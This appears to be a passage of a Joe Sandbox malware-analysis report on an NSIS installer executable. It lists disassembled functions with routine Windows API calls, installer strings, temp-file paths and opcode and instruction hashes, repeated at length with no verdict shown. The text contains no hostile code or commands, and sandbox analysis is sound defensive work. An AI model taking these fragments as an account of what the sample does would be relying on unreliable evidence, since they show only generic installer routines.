                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Message$Send$ClientScreen
                                                                • String ID: f
                                                                • API String ID: 41195575-1993550816
                                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                APIs
                                                                • GetDC.USER32(?), ref: 00401E51
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                  • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                  • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                • String ID: Tahoma
                                                                • API String ID: 2584051700-3580928618
                                                                • Opcode ID: e128970cf71a0b284ce18b21917758e509e5717976d06807f88455f58f814df6
                                                                • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                • Opcode Fuzzy Hash: e128970cf71a0b284ce18b21917758e509e5717976d06807f88455f58f814df6
                                                                • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                APIs
                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                • wsprintfW.USER32 ref: 00402FE5
                                                                • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                • API String ID: 1451636040-1158693248
                                                                • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                APIs
                                                                  • Part of subcall function 6FC612BB: GlobalAlloc.KERNELBASE(00000040,?,6FC612DB,?,6FC6137F,00000019,6FC611CA,-000000A0), ref: 6FC612C5
                                                                • GlobalFree.KERNEL32(?), ref: 6FC62743
                                                                • GlobalFree.KERNEL32(00000000), ref: 6FC62778
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true
                                                                • Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc
                                                                • String ID:
                                                                • API String ID: 1780285237-0
                                                                • Opcode ID: b79e56c096c0b83e7c4bd7260c1ef645144aee4baf2be8fd19a10f45d8ea996b
                                                                • Instruction ID: ae91b3b1ed7cbbefe553dd7d09ec188bcb59405ac39cf907552e2fd9a1f0997d
                                                                • Opcode Fuzzy Hash: b79e56c096c0b83e7c4bd7260c1ef645144aee4baf2be8fd19a10f45d8ea996b
                                                                • Instruction Fuzzy Hash: 3D31C27150C502EFCF158F6AC9E4CBA77B6FF873553144529F20197160EB31A8259B61
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                • String ID:
                                                                • API String ID: 2667972263-0
                                                                • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                                • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                                • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                                APIs
                                                                • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                • wsprintfW.USER32 ref: 00404F1B
                                                                • SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: ItemTextlstrlenwsprintf
                                                                • String ID: %u.%u%s%s$H7B
                                                                • API String ID: 3540041739-107966168
                                                                • Opcode ID: 2edccdcb36c72f9bdce7a586f7ca7ee262dfb9f9a49697097ea36a1117f17e36
                                                                • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                                • Opcode Fuzzy Hash: 2edccdcb36c72f9bdce7a586f7ca7ee262dfb9f9a49697097ea36a1117f17e36
                                                                • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true
                                                                • Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: FreeGlobal
                                                                • String ID:
                                                                • API String ID: 2979337801-0
                                                                • Opcode ID: fee2d2bd6df0c2e05db072541dfd77b11928a1f33885ce9563a0712ef002062c
                                                                • Instruction ID: ff49f8dc784120054767a87f9c332dfe8321583357252f021bb8b2355be4e64e
                                                                • Opcode Fuzzy Hash: fee2d2bd6df0c2e05db072541dfd77b11928a1f33885ce9563a0712ef002062c
                                                                • Instruction Fuzzy Hash: 0C51B4B2D0C119AA8B009FBD85C05ADBBB5FFC9B17F00925BD404A7250F771BA4987A1
                                                                APIs
                                                                • GlobalFree.KERNEL32(00000000), ref: 6FC625C2
                                                                  • Part of subcall function 6FC612CC: lstrcpynW.KERNEL32(00000000,?,6FC6137F,00000019,6FC611CA,-000000A0), ref: 6FC612DC
                                                                • GlobalAlloc.KERNEL32(00000040), ref: 6FC62548
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FC62563
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true
                                                                • Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                • String ID:
                                                                • API String ID: 4216380887-0
                                                                • Opcode ID: 7594270c389c7bc4e52be183e24e37d2d4e7d2ba4f1386334431daa1686985e3
                                                                • Instruction ID: 164f3a8951c04560038f8160863b42e429de1fb5d2d2e881aeeadd382a8a43a7
                                                                • Opcode Fuzzy Hash: 7594270c389c7bc4e52be183e24e37d2d4e7d2ba4f1386334431daa1686985e3
                                                                • Instruction Fuzzy Hash: 8A41CDB050C706EFDB249F2AD8E0AA677F8FB85315F108A2EE54686181F730A545CB61
                                                                APIs
                                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                • String ID:
                                                                • API String ID: 1849352358-0
                                                                • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FC622D8,?,00000808), ref: 6FC616D5
                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FC622D8,?,00000808), ref: 6FC616DC
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FC622D8,?,00000808), ref: 6FC616F0
                                                                • GetProcAddress.KERNEL32(6FC622D8,00000000), ref: 6FC616F7
                                                                • GlobalFree.KERNEL32(00000000), ref: 6FC61700
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true
                                                                • Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                • String ID:
                                                                • API String ID: 1148316912-0
                                                                • Opcode ID: 40d08df92407d5b5e543701c9f67ad2d0ce533ef6bd1d43c17eceed28b73aa12
                                                                • Instruction ID: 325d4e3ec8b57e31ea6f23b2258bdd9eb4f8d5c4e20dcd5910be14312842019b
                                                                • Opcode Fuzzy Hash: 40d08df92407d5b5e543701c9f67ad2d0ce533ef6bd1d43c17eceed28b73aa12
                                                                • Instruction Fuzzy Hash: 4FF0127210A5397BDA2016E78C4CCAB7EACEF8B2F5B110211F71892190C5614C11D7F1
                                                                APIs
                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Timeout
                                                                • String ID: !
                                                                • API String ID: 1777923405-2657877971
                                                                • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CharPrevlstrcatlstrlen
                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                • API String ID: 2659869361-823278215
                                                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6FC61171
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6FC611E3
                                                                • GlobalFree.KERNEL32 ref: 6FC6124A
                                                                • GlobalFree.KERNEL32(?), ref: 6FC6129B
                                                                • GlobalFree.KERNEL32(00000000), ref: 6FC612B1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true
                                                                • Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc
                                                                • String ID:
                                                                • API String ID: 1780285237-0
                                                                • Opcode ID: 9ba120b3285995f71a330799b9506668607da2d8143988660e683572ad4402bb
                                                                • Instruction ID: 466cec371103313bb1d2f30be50283047ce1798bc1d5dfe01fd750e6c1d7a041
                                                                • Opcode Fuzzy Hash: 9ba120b3285995f71a330799b9506668607da2d8143988660e683572ad4402bb
                                                                • Instruction Fuzzy Hash: 5B516FB590C602DFDB00CF6EC9849657BF8FF06B2AB10451AEA44DB251F735E954CB50
                                                                APIs
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dll), ref: 00402695
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsm3A84.tmp$C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dll
                                                                • API String ID: 1659193697-2336392907
                                                                • Opcode ID: 4550f8a347c51466d0af7a45a977123d0158099263826babcca4c1342fca1a91
                                                                • Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
                                                                • Opcode Fuzzy Hash: 4550f8a347c51466d0af7a45a977123d0158099263826babcca4c1342fca1a91
                                                                • Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F
                                                                APIs
                                                                • CloseHandle.KERNEL32(000002EC,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                                • CloseHandle.KERNEL32(000002F8,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                • C:\Users\user\AppData\Local\Temp\nsm3A84.tmp, xrefs: 00403C5B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsm3A84.tmp
                                                                • API String ID: 2962429428-3803279235
                                                                • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                APIs
